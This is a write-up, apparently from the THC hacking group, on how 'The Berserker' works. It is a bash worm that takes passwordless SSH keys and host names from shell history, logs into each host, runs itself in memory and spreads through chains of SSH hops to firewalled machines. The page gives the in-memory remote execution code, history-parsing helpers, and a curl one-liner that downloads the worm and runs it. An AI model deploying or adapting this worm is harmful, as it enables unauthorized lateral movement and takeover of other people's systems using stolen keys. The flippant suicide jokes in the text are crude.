Skip to the content.

Random notes on how The Berserker works.

Executive Summary

The Berserker is a bash script. At this point the reader either has a heart attack or multiple orgasms. There is no in-between.

General

The Berserker looks for any passwordless private ssh-key in ~/.ssh and then gathers information from the User’s shell history (~/.bash_history, .zsh_history and ~/.history) about any host the User connected to in the past. The Berserker then attempts to log into each host and injects itself into the remote’s bash memory. It executes itself on the remote host and continues to do its deeds.

It keeps doing so until all ssh keys have been used and all hosts have been visited.

Example: User alice starts The Berserker on host Earth (the origin). The Berserker finds Alice’s ssh-key and detects (from Alice’s shell history) that alice frequently connects to Mars (as alice) and Jupiter (as root). The Berserker first connects to Mars and executes itself on Mars. Let’s assume The Berserker finds no further ssh-keys on Mars and so it will not spread beyond Mars. Next it connects from Earth to Jupiter. It’s a root login to Jupiter and The Berserker finds many ssh-keys from various users. One such user is bob who frequently connects to Uranus and from there to Pluto. Ultimately The Berserker will get to Pluto via a long ssh chain from Earth->Jupiter->Uranus->Pluto.

At this point the educated reader will realise that The Berserker is deep penetrating Uranus, e.g. Uranus gets owned even if firewalled or not being accessible from the Internet (but accessible from Jupiter).

Berserker implements a text-based communication protocol via the stdin/stdout ssh-chain to send its findings back to Earth (the origin where The Berserker started).

Bash In-Memory execution

Bash has this tremendous ability to load a script from a memory location and without the script needing to be stored on the target host.

cat >e.sh<<__EOF__
#! /bin/bash
echo "Hello '\$USER'"
__EOF__
S="$(cat e.sh | sed 's/\x27/\x27"\x27"\x27/g')"
ssh user@host.com "export SCRIPT='$S'; bash -c \"\$SCRIPT\""
  1. Create a bash script named e.sh.
  2. Slurp the content into the variable $S after converting all ' to '"'"'. That’s a bit freaky but hold your beer.
  3. I use the hex notation (\x27) of ' here or otherwise it would look rather complicated (sed needs the ' escaped so it is double-escaping time): S="$(cat e.sh | sed 's/'"'"'/'"'"'"'"'"'"'"'"'/g')". Most readers would commit suicide at this point. This is just to escape ' correctly so that it can be passed to ssh as a command via a variable (SCRIPT='$S') without interfering with the ' around the $S.
  4. The long string export SCRIPT='$S'; bash -c \"\$SCRIPT\" is passed as a command to ssh to execute on the remote host. Note that the $ in \"\$SCRIPT\" is escaped to prevent the local shell from substituting the variable. We like the remote bash (not the local one) to substitute $SCRIPT. This is only needed because The Berserker needs to access the source of its own script (now stored in $SCRIPT to spread to further hosts). Otherwise bash -c '$S' would work.

No data is written to the target’s host hard drive. All is kept in memory.

SSH has a 128k limit for passing arguments. That ought to be enough for everyone. Otherwise have a look how this limitation is overcome in ssh-it’s hook.sh (piping a script with dd into a remote bash variable and executing the string from memory is a thing….).

Bash Command line parsing

There is no efficient way to convert a command line string from ~/.bash_history to an array in bash.

The history file contains the recently typed commands rather then the executed commands. There is a fine difference. Bash records the input rather then what’s passed to exec(2) system call. Let’s illustrate the problem:

ls foo\ bar

The bash records ls foo\ bar rather than what it actually executes (exec("ls", "foo bar"); note the missing \). This is a problem if there are history entries containing bash variables or escape sequences like $HOME or \ in the file name:

ssh -i $HOME/.ssh/id_dsa\ key.dat root@openbsd.org

The command actually executed is exec("ssh", "-i", "/home/user/.ssh/id_dsa key.dat", "root@openbsd.org") and from the string above it’s impossible to determine which argument is passed as 1st, 2nd or last parameter to exec(2) - only bash knows.

The program xargs comes to the rescue to split the command line string into separate ARGV arguments the same way as bash would do. However, xargs executes another program (with the correctly split arguments). So we used xargs to call bash -c and output each command line argument in a separate line and then convert this into a bash array:

line="$(echo "ssh -i ~/.ssh/id_dsa\ key.dat root@openbsd.org" | xargs bash -c 'n=0; while [[ $n -le ${#} ]]; do eval eval echo "\$${n}"; n=$((n+1)); done')"

The variable line now contains:

ssh
-i
/home/user/.ssh/id_dsa key.dat
root@openbsd.org

Note: The double eval eval is needed. The first one convert the ${#} to the integer number of the arguments passed to the bash by xargs and the second eval resolves the ~/ to the absolute directory name.

That format can now easily be split into an array like so:

IFS=$'\n' MyArray=($line)

We can add this into a nice bash function and have the bash-array returned by pointer (yes, bash can do pointers):

bash -l
cat >test.sh<<__EOF__
cmdline2array()
{
	local line
	# Double eval: 1st: To turn \$1 to argument string. 2nd to turn ~/.ssh to /home/user/.ssh
	line="\$(echo "\$2" | xargs bash -c 'n=0; while [[ \$n -le \${#} ]]; do eval eval echo "\\\$\${n}"; n=\$((n+1)); done')"
	# echo "LINES=\$line"
	IFS=$'\n' eval "\${1}=(\\\$line)"
	IFS=" "
}
__EOF__

# Now calling this function will store the arguments as array in 'MyArray':
source test.sh
cmdline2array MyArray "ssh -i ~/.ssh/id_dsa\ key.dat root@openbsd.org"
echo "Number of elements in MyArray: ${#MyArray[@]}"
# The output is '4'
echo "Content: ${MyArray[*]}"
# The output is: ssh -i /home/user/.ssh/id_dsa key.dat root@openbsd.org

Bash stderr and $? catching

The Berserker needs to check the error output of ssh and also needs the exit-code of ssh and the standard output must pass through. The only way to do this in bash is to play file descriptor bonanza:

{ err="$( { echo 1>&2 "Hello-STDERR"; exit 123; } 2>&1 1>&3 3>&- )"; } 3>&1 || ret=$?
echo "ret=$ret, err=$err"

The output is ret=123, err=Hello-STDERR.

Transport Protocol via STDIN/STDOUT

All the slaves need to report back their findings to Earth (the origin). A simple protocol is used to pass the information from the farthest ssh back to the origin (via a long chain ssh-stdin-chain). In our example from above Pluto would pass the message back to Uranus, Uranus back to Jupitor, … to Mars, … to Earth. All protocol messages are then dispatched at the origin in msg_dispatch(). The protocol messages are rather simple and you can see them by forcing the origin to be a slave with BS_DEBUG_IS_SLAVE=1:

export BS="$(curl -fsSL https://thc.org/ssh-it/bs)" && bash -c "BS_DEBUG_IS_SLAVE=1 $BS"

The output will look similar to this:

|I|0|76672d|[#1] ~/.ssh/id_rsa
|I|0|76672d|[#2] ~/.ssh/id_rsa-old
|T|0|76672d|admin@192.168.1.1|1/112
|O|0|76672d|
|L|1|437048|76672d|admin|ubnt
|C|0|76672d|~/.ssh/id_rsa
|T|0|76672d|pi@192.168.1.18|3/112
|O|0|76672d|
|L|1|39a307|76672d|pi|raspberrypi
|I|1|39a307|Found 1 hosts to try.
|I|1|39a307|Found 1 key without password.
|I|1|39a307|[#1] ~/.ssh/id_rsa

If you are reading this…

If you made it all the way to here then you are the type of person we like to hang out with. Join us.

Contact

X.com: https://x.com/hackerschoice
Mastodon: @thc@infosec.exchange
Telegram: https://t.me/thcorg
Web: https://www.thc.org
Medium: https://medium.com/@hackerschoice
Hashnode: https://iq.thc.org/
Abuse: https://thc.org/abuse
E-Mail: members@proton.thc.org
Signal: ask
SimpleX: ask